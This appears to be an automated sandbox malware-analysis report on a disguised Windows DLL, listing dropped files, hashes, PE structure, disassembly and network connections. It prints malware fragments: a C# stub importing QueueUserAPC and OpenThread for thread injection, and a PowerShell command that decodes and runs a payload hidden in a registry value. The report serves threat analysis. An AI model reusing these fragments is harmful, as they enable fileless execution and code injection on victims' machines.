SHA-256:	7C6583CED2C74B6EE4041D3DB05E2D6FE6C39451D52B6066A62EB4E77924B413
SHA-512:	F470C8C8A108BCE621D8B937021F83A32FC755DC740F5AAF80DA73C6CC6D596A3F0335EA7906602EB84CB576434E8733259DE2E3893F194DA403483127579A16
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.j.a.r.x.o.p.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.j.a.r.x.o.p.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	411
Entropy (8bit):	5.022568322197063
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJwQ5mMRSR7a1yTyShSRa+rVSSRnA/fh14v02JKy:V/DTLDfuqRySQ9rV5nA/TDy
MD5:	9B2165E59D51BB6E8E99190BD9C6BC8B
SHA1:	02B2F188D7654CA079ADA726994D383CF75FF114
SHA-256:	36E14435EE02B02C2B06087FF3750569342E8B8D8571F3F45E61AF50D3B03CEA
SHA-512:	20E05DE0D57D1F6F53FB3290CB1C533D152C6076E2451B0A463D5AD6342976F49F31DDA8CC668E3EC26775E75EE191B8DD44645F40F723667EE8376C84998209
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tseeoxqndt. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr jphxxkfdthf,IntPtr lnf,IntPtr uet);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint wwqqeyldba,uint ccghpcxllqj,IntPtr tobsn);.. }..}.

C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.21276851769897
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fCzxs7+AEszIwkn23fcA:p37Lvkmb6KRf6WZEiff
MD5:	3B157C579378204187CDBC69B49ED46C
SHA1:	D624EC6979128F828CE160ECEF18A6601C9EBB17
SHA-256:	127130604496189191CE98B3AE82159A4992FF51F82F4CFF1DC56CA4F2411300
SHA-512:	9BB6D4B03112D36EDF937BB49AD56E4BAB8B7C3BD037C9A4F05D345157BDEA33EF1D06A6DB38F918A50FEA42AA6F2F0DFA36EF43FC228BDFE542E4EE2387A6F8
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.0.cs"

C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6276593448713483
Encrypted:	false
SSDEEP:	24:etGSr8+mDR853RY0JGm4lp2tkZfjXX3DZ0hEdI+ycuZhNrakSNPNnq:6pmS5+rjJjXDZ6Ed1ulra3Xq
MD5:	1E3EB08EC6543E20C6A786D7936FF803
SHA1:	B4B1027ABA4CFC0566D16161453B5C670141B384
SHA-256:	1E8A693C233CBCDDC45D02DB8C393B404C78006CEAD005733A868DEEC3F5C081
SHA-512:	0BD9EFE08123486855C90F1A86DC38D9D9D85E1107A2680E4BC1FC61B8FB623D19BCB938425429B466750875C5E0E302BA027405FB095374332DFA3FA16034C5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.%`...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....z.....~.....................h. ...h...!.h.%...h............3.8.....=.......J.......].......................................&........<Module>.ljarxop3.dll.tseeoxqndt.W32.mscorl

C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\~DF14DF30D5205D9201.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	192820
Entropy (8bit):	3.1293400952708996
Encrypted:	false
SSDEEP:	3072:SZ/2BfcYmu5kLTzGtFZ/2Bfc/mu5kLTzGt:rU
MD5:	4DAD8A1953DB930D23D6CC2C442E6E0C
SHA1:	8B875BE0BF664ABE461FF522DBEA03626A68AF58
SHA-256:	7AA0D9F2B3958A22BD4E657AF015F77F3BCEE55F4D48A15656FAB2C5CC4C23F6
SHA-512:	CF9DFD66E8BD1F228A1607919216F3D19C75E6B60CCA47AAE39EF7A9C7E0094E0CBDB982984DD1B83BD81DC65D5D11D4D558D2CD290D66FCA898232C6F0B5CDE
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF2FA3F8BD15FCAE55.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40161
Entropy (8bit):	0.6712780869554471
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+yU+XkhnanF30q8IEnanF30q8I7nanF30q8Ik:kBqoxKAuqR+yU+XkhnaFp+naFpVnaFpW
MD5:	975C1A31EE6EC64DC0E5CDEBC6327F58
SHA1:	FE80DEC9CF377B09E3CA6C82B811C35FE0B76913
SHA-256:	3F93E2C129A66CF36DCF1BD43B7E5BF05712FFD75A9835F3C393C51D130B39EA
SHA-512:	F3879F3395989153E6FC307717128207081CB97C83B2C2C97F2E994344DEB31BE53202FA7736D7CC9918E78D224B6BAEE21089055DDFDEC51F107773523D38A0
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF30C70C1FFEBA52E7.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40193
Entropy (8bit):	0.6762860170126571
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+bVHuV+fRuUaiUO+IaibfRuUaiUO+IaioRuUaiUO+IaiF:kBqoxKAuqR+bVHuVYRszSDRszSgRszS9
MD5:	587C0FBCC821BD4069B57562029DE083
SHA1:	0D3352BDF5D81F64CCD21DFC2513B91BCC664831
SHA-256:	33FBB4C5C51B0B4C6AA92324DEF2D57EDB6A2C9D4479A8347817E685D946FE86
SHA-512:	650A1AAC99AF14CC586C2CB0536B4427932522D650D05859E9DF4FD5FAC7474389A793DC622C17FACA51C045C05DD95A4654AADFA5836F3016F960984B2CB20F
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3B3D5A4FBE860D30.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40089
Entropy (8bit):	0.6577162458783209
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+PxzaBAklxzP5GYtklxzP5GYmklxzP5GYL:kBqoxKAuqR+PxzaBAklnkl4kl1
MD5:	C7E3B08C010A5D0355FDE1A81955AECF
SHA1:	DB1302E66C8C8CE45468763945A8E94D8E6A45A4
SHA-256:	6873B843CE42150023508DE1264250F8EB45EEA245BCF30A53D156AD2C7257A9
SHA-512:	16A6AEEBB510C22EC11E57CE1B330CE13E1430D0388D9146C29EEE33D7DA15DC10EB80353FFF626654A139E69753F24FC7C3B92CE98F426F7A85DDA1229BD658
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF8E7826C5CACF4D85.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	modified
Size (bytes):	29745
Entropy (8bit):	0.2920107282763179
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAC9laAC9lrz:kBqoxxJhHWSVSEabeQ2y
MD5:	CE909A43525B3843C907DCBE55E9D7DD
SHA1:	8B6E53CCBAAB132FF8100ECB696282F011402047
SHA-256:	540A8B39EAF1EF9CF341697FC4CDABBEBDED17B16321398C539639FD17EE1602
SHA-512:	027F1DF5288441E3BFF63ABABD90521E2A72DC20FFAC545E0F180483761229D13254375ADA525D3C5155C1BAC6602117B24617A160C4B9D21C30721B9DF17446
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFCB7F517F8398872F.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	14037
Entropy (8bit):	1.0077445507379115
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loWS9loWC9lWW4CW7WyFb3CVUjVUBWJ1CVUBsK08VUMCVj:kBqoIeAZKyFW07W/cCBx3GPMIlu
MD5:	E304A4E9D68501CEE329F77D09DE522B
SHA1:	1F1CC217F4A50B1A00AE9EBC265190E2243BE7BE
SHA-256:	724A27D8466B83DF4929352CB0C369BB2E0C700F75A272DED4B54E7DCE24E762
SHA-512:	B154E44841E3EC744CC7D5D61094598993C8F5E4AE6AC01210A067133ABB0C4257B10AD34A028852BC652504126CBB3C555C983BE5E3E03D5F0B3D18449FAE8C
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\41ZKA9AH5G9YGHATPDVS.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1736343839654215
Encrypted:	false
SSDEEP:	48:JdifmPyIYC9GrIoRAsASFpdifmPyIYh683GrIoRAczudifmPyIYx9GrIoRAV1H:hPym9SxAJOPy73SxA/Pyt9SxAf
MD5:	11F3D40B8738FA3B5699BD3AC453D691
SHA1:	4AB2CB66A190EEB45FCF6940352B6CF418534BAB
SHA-256:	1B6DB9AE521FAB7D5EB74094721CC1638A5F270F2ABBEB85B60F098D5597F5F1
SHA-512:	0E5F91F742A251F97DB3F7416A71F98B4B8590B29DA9F9D6946262633FB93F616209270B29F4BA34ED9A4F43FEBFF05617A272F6B6126B6AA8FB1BB319FF0EB5
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>...\.........?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q{<..PROGRA~1..t......L.>Q{<....E...............J.....s...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.LR................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.JLR.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]..............j.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\Documents\20210212\PowerShell_transcript.888683.H4O8YvGB.20210212014815.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	976
Entropy (8bit):	5.480962104220173
Encrypted:	false
SSDEEP:	24:BxSAJuLi7vBZnDx2DOXUWOLCHGIYBtLWlHjeTKKjX4CIym1ZJXxugOLCHGIYBtD:BZJu8vjDoORF/lqDYB1ZTuoFw
MD5:	6BE6F51ADE02AE987717556966E1397F
SHA1:	047651DC025747D063B135C86698721142AA524F
SHA-256:	5C28F0A98FFC53E987BAA0342F7C84FF513C6DAD72740BFE6396D6D85268FED5
SHA-512:	F37BE53CFAA0AED133D2B3A8793EAD3CE6E6C2490B671E413B6426BD620F9FA1E651EBE9757BB62B95504FA90146C46A4755546603868BAD074ADE24BEC0D414
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210212014815..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 888683 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 3848..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210212014815..********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.687139012925671
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2200.dll
File size:	610304
MD5:	e07d47927df912332bc84b3f98586091
SHA1:	b55a9ae7a9ccd44dd3516e557e295e3f1cce750e
SHA256:	cc849b895a0c8237f81ca3fe6395929713fb7b3f0a7744d3ddc3cb08f9f4351d
SHA512:	05fc68821232f43b1b598a5c3989d18e5487f87316803a8d2e732cd1afed88034f6482be256c9894a4a56b6fe4efdec748a982c90c7609c64d24ff77b5b56396
SSDEEP:	6144:Gp/yi90cYdmY9BRYZxhYVnacWeBg4luVJpVG0qMdRWGzwa1NGr43FUHcI3Gs3OZD:Yai45Taefl2pEQRWGzPMr418GwaPIMT
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./.P.A.P.A.P.A.....R.A.....R.A..L?.R.A.wN<.B.A.wN/.Y.A.wN:.U.A.P.@.b.A.wN,._.A.wN0...A.wN;.Q.A.wN=.Q.A.wN9.Q.A.RichP.A........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1007acb9
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x43E50590 [Sat Feb 4 19:50:40 2006 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a6d55890f5859d9f8802dc75c82d2c1d

Entrypoint Preview

Instruction
cmp dword ptr [esp+08h], 01h
jne 00007F2908839C37h
call 00007F290883CA46h
push dword ptr [esp+04h]
mov ecx, dword ptr [esp+10h]
mov edx, dword ptr [esp+0Ch]
call 00007F2908839B22h
pop ecx
retn 000Ch
sub eax, 000003A4h
je 00007F2908839C54h
sub eax, 04h
je 00007F2908839C49h
sub eax, 0Dh
je 00007F2908839C3Eh
dec eax
je 00007F2908839C35h
xor eax, eax
ret
mov eax, 00000404h
ret
mov eax, 00000412h
ret
mov eax, 00000804h
ret
mov eax, 00000411h
ret
push ebx
push ebp
push esi
push edi
mov ebp, 00000101h
mov esi, eax
push ebp
xor edi, edi
lea ebx, dword ptr [esi+1Ch]
push edi
push ebx
call 00007F290883CA84h
mov dword ptr [esi+04h], edi
mov dword ptr [esi+08h], edi
mov dword ptr [esi+0Ch], edi
xor eax, eax
lea edi, dword ptr [esi+10h]
stosd
stosd
stosd
mov eax, 100900C8h
add esp, 0Ch
sub eax, esi
mov cl, byte ptr [eax+ebx]
mov byte ptr [ebx], cl
inc ebx
dec ebp
jne 00007F2908839C29h
lea ecx, dword ptr [esi+0000011Dh]
mov esi, 00000100h
mov dl, byte ptr [ecx+eax]
mov byte ptr [ecx], dl
inc ecx
dec esi
jne 00007F2908839C29h
pop edi
pop esi
pop ebp
pop ebx
ret
push ebp
lea ebp, dword ptr [esp-0000049Ch]
sub esp, 0000051Ch
mov eax, dword ptr [100907D0h]
xor eax, ebp
mov dword ptr [ebp+00000498h], eax
push ebx
push edi
lea eax, dword ptr [ebp-7Ch]
push eax
push dword ptr [esi+00h]

Rich Headers

Programming Language:

[RES] VS2005 build 50727
[ C ] VS2005 build 50727
[EXP] VS2005 build 50727
[IMP] VS2005 build 50727
[C++] VS2005 build 50727
[ASM] VS2005 build 50727
[LNK] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x8f530	0x62	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8ee04	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x99000	0x348	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0xe9c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x85170	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x8ea98	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x85000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x83374	0x84000	False	0.820872913707	data	6.70027517881	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x85000	0xa592	0xb000	False	0.442693536932	data	6.27189414205	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x90000	0x8df8	0x2000	False	0.205200195312	DOS executable (COM, 0x8C-variant)	2.22428200232	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x99000	0x348	0x1000	False	0.096923828125	data	0.8911232546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9a000	0x19ac	0x2000	False	0.393920898438	data	3.98288069805	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x99060	0x2e4	data	English	United States

Imports

DLL	Import
KERNEL32.dll	GetProcAddress, GetSystemDirectoryA, VirtualProtect, GetCurrentDirectoryA, FindFirstChangeNotificationA, GetTempPathA, LoadLibraryA, HeapSize, RtlUnwind, FreeLibrary, GetTickCount, Sleep, EnterCriticalSection, GetEnvironmentVariableA, InitializeCriticalSection, GetCurrentThreadId, GetCommandLineA, HeapFree, GetVersionExA, HeapAlloc, GetProcessHeap, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetLastError, MultiByteToWideChar, LCMapStringA, WideCharToMultiByte, LCMapStringW, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, UnhandledExceptionFilter, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetStringTypeA, GetStringTypeW, LeaveCriticalSection, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLocaleInfoA, WriteFile, VirtualAlloc, HeapReAlloc
USER32.dll	ExitWindowsEx, EndDeferWindowPos, SetParent, InflateRect, IntersectRect
GDI32.dll	GetTextExtentPoint32A, SetPixel, StretchBlt, CreateCompatibleBitmap, PatBlt

Exports

Name	Ordinal	Address
@DllRegisterServer@0	1	0x1007a3d0
@Lake@0	2	0x1007a690

Version Infos

Description	Data
LegalCopyright	Copyright 1998-2016 Cover wall, Inc
InternalName	Knew stretch
FileVersion	4.6.2.597
CompanyName	Cover wall
ProductName	Cover wall
ProductVersion	4.6.2.597
FileDescription	Knew stretch
OriginalFilename	Hunt.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 12, 2021 01:47:03.957350016 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:03.957506895 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.005125999 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.005228996 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.005625963 CET	443	49721	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.005737066 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.005903959 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.053437948 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.054070950 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.054132938 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.054167032 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.054303885 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.063354969 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.063747883 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.063946962 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.064878941 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.111686945 CET	443	49721	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.112014055 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.112061977 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.112101078 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.112373114 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.112462044 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.112896919 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.112982035 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.113424063 CET	443	49721	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.113491058 CET	443	49721	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.113514900 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.113539934 CET	443	49721	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.113585949 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.113610029 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.117410898 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.117815971 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.117950916 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.130259991 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.130311012 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.130579948 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.164125919 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.164170980 CET	443	49721	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.164386034 CET	443	49721	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.164427042 CET	443	49721	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.164464951 CET	443	49721	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.164469957 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.164500952 CET	443	49721	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:04.164510965 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.164567947 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.186609983 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:47:04.234770060 CET	443	49721	104.20.185.68	192.168.2.4
Feb 12, 2021 01:47:07.811521053 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.811563969 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:47:07.817976952 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.818099976 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.818166971 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.818217039 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.818348885 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.818407059 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:47:07.861628056 CET	443	49736	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.861668110 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:47:07.861692905 CET	443	49735	151.101.1.44	192.168.2.4
